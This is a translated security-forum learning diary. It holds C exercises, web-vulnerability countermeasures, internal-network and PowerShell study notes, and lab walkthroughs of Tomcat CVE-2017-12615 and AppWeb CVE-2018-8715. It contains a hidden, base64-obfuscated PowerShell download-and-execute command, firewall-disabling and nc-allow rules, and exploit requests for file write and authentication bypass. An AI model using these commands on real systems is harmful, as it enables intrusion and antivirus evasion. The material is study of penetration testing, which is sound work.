安全矩阵 (Security Matrix forum)

Thread starter: sandalwood

Ma Pengyun's Learning Diary

Posted by the thread starter on 2021-10-25 22:27:07
I had a lot of classes today, so I only wrote a few C programs (they may be fairly simple, but I really haven't written any in a long time and feel out of practice):

# Two Sum

Given an integer array nums and an integer target value target, find the two integers in the array whose sum equals target and return their array indices.

You may assume that each input has exactly one answer. However, the same element of the array may not appear twice in the answer.
```c
#include <stdlib.h>

/**
 * Note: The returned array must be malloced, assume caller calls free().
 */
int* twoSum(int* nums, int numsSize, int target, int* returnSize)
// Given an integer array nums and a target value target, find the two integers whose sum is target and return their indices.
{
    int i, j;
    int *result = NULL;
    *returnSize = 2;
    for (i = 0; i < numsSize - 1; i++)
    {
        for (j = i + 1; j < numsSize; j++) // an element may not appear twice in the answer, so search only the elements after i
        {
            if (nums[i] + nums[j] == target)
            {
                result = (int*)malloc(sizeof(int) * 2); // sizeof(node) gives the size of type node; malloc(sizeof(node)) requests one node's worth of memory (an empty node)
                // malloc is declared in the standard header <stdlib.h>
                result[0] = i;
                result[1] = j;
                return result;
            }
        }
    }
    *returnSize = 0; // no pair found: report an empty result
    return result;   // and return NULL
}
```



# Reverse Integer

> Given a signed 32-bit integer x, return x with its digits reversed.
>
> If reversing x causes the value to go outside the signed 32-bit integer range [−2^31, 2^31 − 1], return 0.
> Assume the environment does not allow storing 64-bit integers (signed or unsigned).

```c
#include <limits.h>

int reverse(int x){
    long long mod, result = 0; // wide enough that result*10 cannot overflow before the range check below

    while (x) {
        mod = x % 10;      // in C99 the remainder takes the sign of x, so negative inputs work too
        x = x / 10;
        result = result * 10 + mod;
    }

    if (result > INT_MAX || result < INT_MIN) return 0; // reversed value does not fit a 32-bit int
    return (int)result;
}
```

# Palindrome Number

> Given an integer x, return true if x is a palindrome integer and false otherwise.
>
> A palindrome is an integer that reads the same forwards (left to right) and backwards (right to left). For example, 121 is a palindrome and 123 is not.

```c
#include <stdbool.h>

bool isPalindrome(int x){
    int a[20], i, j; // a 32-bit int has at most 10 digits
    if (x < 0) return false;
    for (i = 0; x != 0; i++)
    {
        a[i] = x % 10; // store the digits least-significant first
        x = x / 10;
    }
    for (j = 0; j < i / 2; j++)
    {
        if (a[j] != a[i - j - 1]) return false; // compare digits from both ends
    }
    return true;
}
```

Posted by the thread starter on 2021-10-26 22:40:15
Some reading notes from today:

## Ten common web vulnerabilities (countermeasures)

**https://www.cnblogs.com/yzloo/p/10391067.html**

### SQL injection

(1) Use the parameterised query interface provided by the database for all queries; a parameterised statement uses parameters instead of embedding user-input variables into the SQL statement. Almost every database system today offers an interface for executing parameterised SQL statements, and using it is a very effective defence against SQL injection.

(2) Escape or encode special characters ('"<>&*; and so on) before they enter the database.

(3) Confirm the type of every piece of data; for example, numeric data must actually be numeric, and the corresponding storage field in the database must be of type int.

(4) Strictly define data lengths, which to some extent prevents longer SQL injection statements from executing correctly.

(5) Use one character encoding consistently across every data layer of the site, preferably UTF-8 throughout; inconsistent encodings between layers can allow some filtering models to be bypassed.

(6) Strictly limit the database privileges of the web site's database user, granting only what the work requires, so as to minimise the damage an injection attack can do to the database.

(7) Avoid displaying SQL error messages on the site, such as type errors or field mismatches, so that attackers cannot draw inferences from them.

(8) Before the site goes live, test it with a professional SQL injection detection tool and patch any SQL injection vulnerabilities promptly.
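The difference between points (1), (3) and (4) and string-built SQL, as an added example written for this page (not from the post or the article it quotes): the same lookup done by embedding the input in the statement text and by binding it as a parameter behind a type and length check. The sample table and the `user_id` inputs are constructed.

```python
import sqlite3

MAX_ID_LENGTH = 10  # point (4): an upper bound on the accepted input length


def sample_db() -> sqlite3.Connection:
    # Constructed in-memory sample data for the demonstration.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (id, name, role) VALUES (?, ?, ?)",
        [(1, "alice", "admin"), (2, "bob", "user"), (3, "carol", "user")],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, user_id: str) -> list:
    # What point (1) warns against: the input becomes part of the statement text,
    # so any SQL it carries is parsed and executed along with the query.
    sql = "SELECT name FROM users WHERE id = " + user_id
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    # Points (3) and (4): the id must be a decimal integer of bounded length
    # before it goes anywhere near the database.
    if not (0 < len(user_id) <= MAX_ID_LENGTH and user_id.isdigit()):
        raise ValueError("id must be a decimal integer")
    # Point (1): a parameterised statement. The driver binds the value, so it can
    # never be interpreted as SQL no matter what it contains.
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (int(user_id),))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = sample_db()
    print(lookup_unsafe(db, "2"))           # ['bob']
    print(lookup_unsafe(db, "2 OR 1=1"))    # every name: the WHERE clause was rewritten
    print(lookup_safe(db, "2"))             # ['bob']
    try:
        lookup_safe(db, "2 OR 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```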

### Cross-site scripting (XSS)

(1) As with the advice for SQL injection, assume all input is suspect and strictly check all input for strings such as script and iframe. "Input" here means not only the interfaces the user interacts with directly, but also variables in the HTTP request's cookies, variables in the HTTP request headers, and so on.

(2) Validate not only the type of the data but also its format, length, range and content.

(3) Do not validate and filter data only on the client side; the critical filtering steps must happen on the server.

(4) Check output data as well. A value from the database may be output in many places on a large site, so even if it was encoded on input, security checks are still needed at every output point.

(5) Test against all known threats before releasing the application.

### Weak passwords

1. Avoid habitual passwords as far as possible
2. Mandate the composition rules and the password length

### HTTP header tracing vulnerability (quoted verbatim)

The HTTP/1.1 specification (RFC 2616) defines the HTTP TRACE method, intended mainly for clients to test or obtain diagnostic information by sending a TRACE request to the web server. When TRACE is enabled on the web server, the submitted request headers are returned in full in the body of the server's response, and those HTTP headers may well include the session token, cookies or other authentication information. An attacker can exploit this to deceive legitimate users and obtain their private information. The vulnerability is usually combined with other techniques to mount an effective attack; because an HTTP TRACE request can be issued from a client-side browser script (such as XMLHttpRequest) and the result accessed through the DOM, it is easy for an attacker to exploit.

The usual defence against the HTTP header tracing vulnerability is to disable the HTTP TRACE method.

### Struts2 remote command execution vulnerability

Apache Struts is an open-source framework for building Java web applications. Apache Struts has an input filtering flaw: when a conversion error occurs, it can be exploited to inject and execute arbitrary Java code.

Most web sites with a remote code execution vulnerability have it because the site uses Apache Struts XWork as its application framework; the software has a high-severity remote code execution vulnerability, which puts the site at risk. CNVD has handled many such vulnerabilities, for example the remote command execution vulnerability in the "GPS vehicle satellite positioning system" web site (CNVD-2012-13934) and the remote code execution vulnerability in the Aspcms guest book (CNVD-2012-11590).

To fix this kind of vulnerability, simply upgrade Apache Struts to the latest version from the Apache site: http://struts.apache.org

### File upload

Restrict the file type and size;

Restrict the user's permissions properly;

### Private IP address disclosure

Prevent the machine from being pinged directly

Install software that automatically strips the IP information from the headers of outgoing packets. Such software has drawbacks, however: it consumes a lot of resources and slows the computer down, affects access to some forums and web sites, is unsuitable for internet cafe users, and so on.

The most widespread way for individual users to hide their IP today is probably to use a proxy: once a proxy server is in use, the "address translation service" modifies the outgoing packets, which defeats the "packet analysis" method.

### Unencrypted login requests

Encrypt the username and password before transmitting them; do not send them in the clear

### Directory traversal

Prevent users from appending "../", or any variant of "../" (such as "..\" or "..//", or even their encoded forms), to the URL or to directories with special meaning

### Command execution

Restrict the characters or commands a user may submit
Posted by the thread starter on 2021-10-28 21:54:05
I've spent the last two days on my data structures homework and read part of an article; excerpts below:

## Internal network study notes collection

https://teamssix.com/211027-163641.html

### Common terms explained

#### Workgroup

A workgroup is the most common, simplest and most basic resource management model: different computers are placed in different groups according to their function to make management easier. All computers in a workgroup are peers, with no distinction between managing and managed machines, which is why a workgroup network is also called a peer-to-peer network. For an administrator, the workgroup model is inconvenient to manage.

#### Domain

##### Domain

A domain can be understood simply as an upgraded workgroup: in the domain model, at least one server, acting like a gatekeeper, is responsible for authenticating every computer and user that joins the network. That server is called the domain controller.

##### Domain controller

The domain controller (DC) holds a database made up of the domain's accounts and passwords, the computers that belong to the domain, and similar information.

When a computer joins the network, the domain controller first checks whether the computer belongs to the domain, whether the logon account the user is using exists, and whether the password is correct. If any of these is wrong, the domain controller refuses to let that user log on from that computer. Unable to log on, the user cannot access permission-protected resources on the server, which protects the network's resources to some extent.

Precisely because the domain controller performs this authentication role, from a penetration-testing point of view taking over the domain controller is crucial. Taking the domain controller is equivalent to obtaining the accounts and passwords of every computer in the domain.

##### Parent and child domains

If a domain (B) is created under a domain (A), B is a child domain of A and A is the parent domain of B. Each domain has its own independent security policy.

##### Domain tree

A domain tree consists of multiple domains that share the same schema and configuration and form a contiguous namespace.

The domains in the tree are linked by trust relationships, and Active Directory contains one or more domain trees. The deeper a domain sits in the tree, the lower its level; each "." represents one level, so the domain child.Microsoft.com is lower than the domain Microsoft.com, because it has two levels while Microsoft.com has only one.

Likewise the domain Grandchild.Child.Microsoft.com is lower than Child.Microsoft.com, for the same reason. They all belong to the same domain tree, and Child.Microsoft.com is a child domain of Microsoft.com.

Multiple domain trees can form a forest.

##### Forest

A forest consists of one or more domain trees that do not form a contiguous namespace. The most obvious difference from a domain tree is that the trees in a forest do not share a contiguous namespace, whereas a domain tree is made up of domains that do.

All the domain trees in a forest still share the same schema, configuration and global catalog. The domain trees in a forest are linked through Kerberos trust relationships, so every domain tree knows about the Kerberos trusts and different domain trees can cross-reference objects in one another. Every forest has a root domain, which is the first domain created in the forest, and the root domain of every domain tree in the forest has a transitive trust relationship with the forest root domain.

For example, given benet.com.cn, one can create accp.com.cn in the same forest, and the two are then in one forest.

When the first domain controller is created, the first domain (also called the forest root domain) and the first forest are created.

A forest is composed of one or more domains that share a common schema and global catalog; each domain has its own security policy and its trust relationships with the other domains. An organization can have multiple forests.

#### Active Directory

Active Directory (AD) is the centralized directory management service in Windows Server responsible for large network environments; it has been built into Windows Server products since Windows 2000 Server.

The directory contains information about all kinds of objects, such as users, groups, computers, domains, organizational units (OUs) and security policies. The directory is stored on the domain controllers and can be accessed by network applications and services.

Active Directory is effectively a directory of the various resources on the internal network, through which users can quickly locate those resources.

#### DMZ

The DMZ (`demilitarized zone`), known in Chinese as the "isolation zone" or "demilitarized zone", is a buffer between the non-secure and the secure systems, set up to solve the problem that once a firewall is installed, users on the external network cannot reach the servers on the internal network.

The DMZ can be understood as a special network area distinct from both the external and the internal network; it usually hosts public servers that contain no confidential information, such as web, e-mail and FTP servers. Visitors from the external network can then reach only the services in the DMZ and cannot touch the information stored on the internal network, so even if a server in the DMZ is compromised, the information on the internal network is not affected.

#### Permissions within a domain

First, the concept of a group: a group contains many users, and when an administrator wants to grant a user certain permissions, the user simply needs to be added to the group that has them, which improves management efficiency. The common groups are domain local groups, global groups and universal groups.

##### Domain local group (DL)

Member scope: all domains;

Usage scope: its own domain

##### Global group (G)

Member scope: its own domain;

Usage scope: all domains

##### Universal group (U)

Member scope: all domains;

Usage scope: all domains

##### The A-G-DL-P strategy

The A-G-DL-P strategy adds user accounts to global groups, adds the global groups to domain local groups, and then assigns resource permissions to the domain local groups.

- **A stands for user account**
- G stands for global group
- U stands for universal group
- DL stands for domain local group
- **P stands for resource permissions**

### PowerShell

#### Introduction

PowerShell can be thought of simply as an advanced version of cmd: anything cmd can do, PowerShell can do, and PowerShell can do a great deal that cmd cannot.

PowerShell is built into Windows 7, Windows Server 2008 R2 and later Windows systems. It is built on the .NET platform, and everything passed between commands is a .NET object.

PowerShell has the following characteristics:

- Installed by default on **Windows 7 and later** operating systems
- **PowerShell scripts can run in memory** without being written to disk
- A PowerShell script can be downloaded from another system and executed
- Many current tools are built on PowerShell
- Much security software does not detect PowerShell activity
- **cmd is usually blocked from running, but PowerShell is not** (I find this very interesting; it seems one could simply run the target's PowerShell directly to operate)
- It can be used to **manage Active Directory**

Type Get-Host or $PSVersionTable to see the PowerShell version:

```
PS C:\Users\teamssix> Get-Host

Name             : ConsoleHost
Version          : 5.1.18362.1171
InstanceId       : a0a6f8f2-f86a-477f-bf4b-b94b452bee3c
UI               : System.Management.Automation.Internal.Host.InternalHostUserInterface
CurrentCulture   : zh-CN
CurrentUICulture : zh-CN
PrivateData      : Microsoft.PowerShell.ConsoleHost+ConsoleColorProxy
DebuggerEnabled  : True
IsRunspacePushed : False
Runspace         : System.Management.Automation.Runspaces.LocalRunspace


PS C:\Users\teamssix> $PSVersionTable

Name                           Value
----                           -----
PSVersion                      5.1.18362.1171
PSEdition                      Desktop
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0...}
BuildVersion                   10.0.18362.1171
CLRVersion                     4.0.30319.42000
WSManStackVersion              3.0
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1
```

PowerShell versions corresponding to Windows operating systems:

1.0     Windows Server 2008

2.0     Windows Server 2008 R2, Windows 7

3.0     Windows Server 2012, Windows 8

4.0     Windows Server 2012 R2, Windows 8.1

5.0     Windows 10

5.1     Windows Server 2016

#### Basic concepts

##### ps1 files

ps1 is the **script file extension** for PowerShell; a PowerShell script file is really just a plain text file.

##### Execution policy

To prevent malicious scripts from running in PowerShell, PowerShell has an execution policy; by default this policy is the restricted mode, `Restricted`.

Use the `Get-ExecutionPolicy` command to see the current execution policy

```
PS C:\Users\teamssix> Get-ExecutionPolicy
Restricted
```

The execution policies are:

**Restricted**: scripts cannot run

**RemoteSigned**: locally created scripts can run, but scripts downloaded from the internet cannot (unless they carry a digital signature from a trusted publisher)

**AllSigned**: scripts run only if they are signed by a trusted publisher.

**Unrestricted**: script execution is unrestricted, regardless of origin and regardless of whether the scripts are signed.

Use `Set-ExecutionPolicy <policy name>` to set the execution policy; this command **requires administrator privileges**

```
PS C:\WINDOWS\system32> Set-ExecutionPolicy Unrestricted

执行策略更改
执行策略可帮助你防止执行不信任的脚本。更改执行策略可能会产生安全风险,如 https:/go.microsoft.com/fwlink/?LinkID=135170 中的 about_Execution_Policies 帮助主题所述。是否要更改执行策略?
[Y] 是(Y)  [A] 全是(A)  [N] 否(N)  [L] 全否(L)  [S] 暂停(S)  [?] 帮助 (默认值为“N”): A

PS C:\WINDOWS\system32> Get-ExecutionPolicy
Unrestricted
```

##### Running scripts

PowerShell runs scripts in much the same way as other shells: you can enter the full path, or change into the directory containing the ps1 file and run it there, as follows:

```
PS C:\Users\teamssix> C:\t.ps1
hello TeamsSix

PS C:\Users\teamssix> cd C:\

PS C:\> .\t.ps1
hello TeamsSix
```

> I can't help complaining here: when I read the Baidu Baike entry, its description of running PowerShell scripts was this: "Suppose you want to run a script named a.ps1; you can type C:\Scripts\aps1. The biggest exception is that **if the PowerShell script file happens to be located in your system directory, you can run it simply by typing the script file name at the command prompt**."
>
> Which directory is this "system directory" supposed to be? C:\ or C:\windows\system? And what on earth is "the biggest exception"? Honestly, it reads like machine translation.

##### Pipeline

The pipeline in PowerShell is similar to the one in Linux: the output of the previous command becomes the input of the next, and the two commands are joined with "|".

For example, to get process information in PowerShell and sort it by process ID

```
PS C:\> Get-Process | Sort-Object ID

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
      0       0       60          8                 0   0 Idle
   3038       0      208       4760                 4   0 System
      0      12     7732      81344                88   0 Registry
     53       3     1160        752               368   0 smss
    256      10     2468       7424               424   0 svchost
    662      21     1788       4668               504   0 csrss
    160      11     1364       5660               580   0 wininit
    653      27    18592     177580               588   1 csrss
   1219      67    59660         52       2.59    600   1 WinStore.App
    278      14     3108      15656               684   1 winlogon
    687      11     5420       9432               724   0 services
```

At first I typed it wrong, as Get-Process | Sort-Object IP, and got the following result (it looks very similar to the result of Get-Process | Sort-Object ID, with the same headers, but the data inside is different):

#### Commands

> -NoLogo: start PowerShell without displaying the copyright banner
>
> -WindowStyle Hidden (-W Hidden): hide the window
>
> -NoProfile (-NoP): do not load the current user's profile
>
> -Enc: execute a base64-encoded PowerShell script string
>
> -ExecutionPolicy Bypass (-Exec Bypass): bypass the execution security policy
>
> -Noexit: do not exit the shell after execution, which matters when using scripts such as keyloggers
>
> -NonInteractive (-NonI): non-interactive mode, in which PowerShell gives the user no interactive prompts

In PowerShell the command naming convention is very consistent: all commands take the verb-noun form, such as New-Item, and the verb is typically Add, New, Get, Remove, Set and so on. PowerShell is also compatible with cmd and Linux commands; for instance, dir or ls can be used to list a directory.

##### Bypassing local restrictions to execute

As mentioned above, PowerShell's execution policy defaults to the restricted mode `Restricted`, which means that during a penetration test we need some way around this policy in order to run our script files.

First, let's look at what happens when a script is run in the default restricted mode

```
PS C:\Users\teamssix> powerShell.exe Get-ExecutionPolicy
Restricted

PS C:\Users\teamssix> PowerShell.exe -File t.ps1
无法加载文件 C:\Users\teamssix\t.ps1,因为在此系统上禁止运行脚本。有关详细信息,请参阅 https:/go.microsoft.com/fwlink/?
LinkID=135170 中的 about_Execution_Policies。
    + CategoryInfo          : SecurityError: ( [],ParentContainsErrorRecordException
    + FullyQualifiedErrorId : UnauthorizedAccess
```

The system reports that running scripts is disabled on this system, but adding `-ExecutionPolicy Bypass` gets around this restriction

```
PS C:\Users\teamssix> cat .\t.ps1
echo "Hello TeamsSix"

PS C:\Users\teamssix> PowerShell.exe -ExecutionPolicy Bypass -File t.ps1
hello TeamsSix
```

##### Bypassing local restrictions and executing hidden

**Adding `-WindowStyle Hidden -NoLogo -NonInteractive -NoProfile` hides the execution.**

```
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -File t.ps1
```

##### Downloading a remote script, bypassing restrictions and executing hidden

```
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile "IEX(New-Object Net.WebClient).DownloadString('http://172.16.214.1:8000/t.ps1')"
```

Or in abbreviated form

```
PowerShell.exe -Exec Bypass -W Hidden -NoLogo -NonI -NoP "IEX(New-Object Net.WebClient).DownloadString('http://172.16.214.1:8000/t.ps1')"
```

##### Base64-encoding the command

Base64 encoding is used mainly to obfuscate the code so that antivirus software does not catch it. After some trial, plain Base64 encoding does not work here; an encoding tool on GitHub can be used instead, download address:

https://raw.githubusercontent.co ... aster/ps_encoder.py

After downloading it, first save the command to execute in a text file (here tmp.txt), then run `python ps_encoder.py -s tmp.txt`

```
>cat tmp.txt
IEX(New-Object Net.WebClient).DownloadString('http://172.16.214.1:8000/t.ps1')
>python ps_encoder.py -s tmp.txt
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwAyAC4AMQA2AC4AMgAxADQALgAxADoAOAAwADAAMAAvAHQALgBwAHMAMQAnACkA
```

Use -Enc to pass the Base64-encoded content

```
PowerShell.exe -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwAyAC4AMQA2AC4AMgAxADQALgAxADoAOAAwADAAMAAvAHQALgBwAHMAMQAnACkA
```

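From the defender's side, the switches listed under "Commands" and the `-Enc` encoding shown above are exactly what a process-creation log can be checked for. The following is an added example written for this page (not from the notes or from teamssix): it canonicalises the abbreviated switch names, decodes a `-EncodedCommand` payload (base64 of the UTF-16LE script text) and reports the indicators. The sample command lines are constructed from the forms shown above; the base64 string is the one the post produced with ps_encoder.py.

```python
import base64
import binascii
import re
import shlex

# Full powershell.exe switch names. PowerShell accepts any unambiguous prefix
# (-Exec, -W, -NoP, -NonI, -Enc ...), so detection must canonicalise before matching.
SWITCHES = (
    "-encodedcommand", "-executionpolicy", "-windowstyle", "-noprofile",
    "-noninteractive", "-nologo", "-noexit", "-command", "-file",
)
TAKES_VALUE = {"-encodedcommand", "-executionpolicy", "-windowstyle", "-command", "-file"}

# Constructed sample command lines: the first two mirror the forms in the post above,
# the third is a benign scheduled-script invocation for comparison.
SAMPLE_ENCODED = (
    "PowerShell.exe -Exec Bypass -Enc "
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwAyAC4AMQA2AC4A"
    "MgAxADQALgAxADoAOAAwADAAMAAvAHQALgBwAHMAMQAnACkA"
)
SAMPLE_PLAIN = (
    "PowerShell.exe -Exec Bypass -W Hidden -NoLogo -NonI -NoP "
    "\"IEX(New-Object Net.WebClient).DownloadString('http://172.16.214.1:8000/t.ps1')\""
)
SAMPLE_BENIGN = r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"


def canonical_switch(token: str):
    """Expand an abbreviated switch to its full name, or return None if it is not one."""
    t = token.lower().replace("\u2013", "-")  # the post's prose writes "–Enc" with an en dash
    if not t.startswith("-"):
        return None
    if t == "-e":  # documented short form of -EncodedCommand
        return "-encodedcommand"
    matches = [name for name in SWITCHES if name.startswith(t)]
    return matches[0] if len(matches) == 1 else None


def decode_encoded_command(b64: str):
    """-EncodedCommand carries base64 of the UTF-16LE script text; None if it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def split_cmdline(cmdline: str) -> list:
    lex = shlex.shlex(cmdline, posix=True)
    lex.whitespace_split = True
    lex.commenters = ""  # '#' is not a comment marker on a command line
    lex.escape = ""      # keep Windows backslashes in paths intact
    return list(lex)


def analyze_cmdline(cmdline: str) -> dict:
    """Return the switches, the recovered script text and the suspicious indicators."""
    tokens = split_cmdline(cmdline)
    result = {"switches": {}, "command": None, "decoded_command": None, "indicators": []}
    i = 1  # token 0 is the executable
    while i < len(tokens):
        name = canonical_switch(tokens[i])
        if name is None:
            result["command"] = tokens[i]  # a bare argument is run as -Command text
            i += 1
        elif name in TAKES_VALUE:
            result["switches"][name] = tokens[i + 1] if i + 1 < len(tokens) else ""
            i += 2
        else:
            result["switches"][name] = True
            i += 1
    sw = result["switches"]
    if sw.get("-executionpolicy", "").lower() == "bypass":
        result["indicators"].append("execution policy bypass")
    if sw.get("-windowstyle", "").lower() == "hidden":
        result["indicators"].append("hidden window")
    if "-encodedcommand" in sw:
        result["indicators"].append("encoded command")
        result["decoded_command"] = decode_encoded_command(sw["-encodedcommand"])
    if "-command" in sw and result["command"] is None:
        result["command"] = sw["-command"]
    text = result["decoded_command"] or result["command"] or ""
    if re.search(r"\biex\b|invoke-expression", text, re.I):
        result["indicators"].append("invoke-expression")
    if re.search(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", text, re.I):
        result["indicators"].append("remote download")
    return result


if __name__ == "__main__":
    for sample in (SAMPLE_ENCODED, SAMPLE_PLAIN, SAMPLE_BENIGN):
        print(analyze_cmdline(sample))
```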

### Local workgroup information gathering

#### 1. Gathering local workgroup information manually

- Check current privileges

```
whoami
```

- Local network configuration

```
ipconfig /all
```

- OS and version information (English edition)

```
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```

This one doesn't seem to work well for me; it just loaded for a moment and returned nothing.

What I found online is that it should be: wmic os get caption

- OS and version information (Chinese edition)

```
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"
```

- Check the system architecture

```
wmic os get osarchitecture
```

- List all environment variables

```
Get-ChildItem env:
```

- Installed software with version and path information

```
wmic product get name,version
```

- Collect software version information with PowerShell

```
powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"
```

- Query local service information

```
wmic service list brief
```

- Query the process list

```
tasklist /v
```

- View process information with wmic

```
wmic process list brief
```
- View startup programs

```
wmic startup get command,caption
```

- View scheduled tasks

```
schtasks /query /fo LIST /v
```

- View host uptime

```
net statistics workstation
```

- Query the user list

```
net user
```

- View information on a specific user

```
net user teamssix
```

- View local administrator users

```
net localgroup administrators
```

- View the currently logged-on user

```
whoami
```

- List or disconnect sessions between the local computer and connected clients

```
net session
```

- View the port list

```
netstat -ano
```

- View the patch list

```
systeminfo
```

- View the patch list with wmic

```
wmic qfe get Caption,Description,HotFixID,InstalledOn
```

- View local shares

```
net share
```

- View the share list with wmic

```
wmic share get name,path,status
```

- Query the routing table and the ARP cache of all available interfaces

```
route print
arp -a
```
- Query firewall configuration

  Turn off the firewall:

  ```
  netsh firewall set opmode disable             (Windows Server 2003 and earlier)
  netsh advfirewall set allprofiles state off   (after Windows Server 2003)
  ```

  View the firewall configuration:

  ```
  netsh firewall show config
  ```

  Modify the firewall configuration:

  ```
  (Windows Server 2003 and earlier) allow all connections for a given program
  netsh firewall add allowedprogram c:\nc.exe "allow nc" enable
  (after Windows Server 2003) allow a given program inbound
  netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"
  allow a given program outbound
  netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="C:\nc.exe"
  allow port 3389 through
  netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
  ```

  Custom firewall log location:

  ```
  netsh advfirewall set currentprofile logging filename "C:\windows\temp\fw.log"
  ```

- View the computer's proxy configuration

```
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
```

- Query and enable the remote connection service

  View the remote connection port (0xd3d converted to decimal is 3389):

  ```
  REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber
  ```

  Enable port 3389 on Windows Server 2003:

  ```
  wmic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
  ```

  Enable port 3389 on Windows Server 2008 and Windows Server 2012:

  ```
  wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
  wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1
  reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
  ```
#### 2. Gathering local workgroup information automatically

##### wmic script

wmic script download address: https://www.fuzzysecurity.com/scripts/files/wmic_info.rar

Run the script directly on the target host; when it finishes it produces an output.html file.

##### PowerShell Empire

PowerShell Empire, known in Chinese simply as "帝国" (the Empire), is a penetration tool built for the Windows platform. Some differences between Empire and the all-purpose MSF:

- MSF is cross-platform and can attack Windows, Linux and Mac alike, but **Empire targets Windows only**
- MSF combines information gathering, exploitation, post-exploitation, trojans and social engineering in one comprehensive tool, while Empire focuses on internal network penetration and is built around PowerShell

Once a host has checked in to Empire, the `powershell/situational_awareness/host/winenum` module can be used to view local user information, basic system information, the clipboard and so on.

The `powershell/situational_awareness/host/computerdetails` module shows richer information, such as RDP logon information and host time logs; running this module requires administrator privileges.

Posted by the thread starter on 2021-10-29 22:12:40
## Tomcat PUT method arbitrary file write vulnerability (CVE-2017-12615)

> Environment required for the vulnerability:
>
> Tomcat 7.0.79 (with the PUT method enabled)
>
> Tomcat 8.5.19
>
> JDK 1.8.0

After entering the environment, it is obviously a Tomcat setup.

Refresh the page and capture the request with Burp Suite, which gives the following:

```
GET / HTTP/1.1

Host: 127.0.0.1:8080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0
```

Delete everything in the request and replace it with:

```
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell
```

After clicking Forward, visit the URL http://127.0.0.1:8080/1.jsp

which gives the following page.

The page content (viewing the source) is:

```
shell
```

This shows that files can be written to the Tomcat server this way.

## AppWeb authentication bypass vulnerability (CVE-2018-8715)

Visiting the address shows a popup asking for a username and password.

So I opened Burp Suite to capture the request while visiting the address and got the following:

```
GET / HTTP/1.1

Host: 127.0.0.1:8080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1
```

Send the request to the Repeater module and change it to the following (I heard that a user named admin is already known):

Remember to leave two blank lines at the end, otherwise you won't get a session

```
GET / HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Digest username=admin


```

After clicking Send, the session can be found in the response:

```
Set-Cookie: -http-session-=1::http.session::da0004e344342117b375a45e643b6b4c; path=/; domain=127.0.0.1; httponly
```

Change the request to the following (adding the session):

```
POST / HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
-http-session-=1::http.session::da0004e344342117b375a45e643b6b4c
Authorization: Digest username=admin
Content-Length: 14



username=admin
```

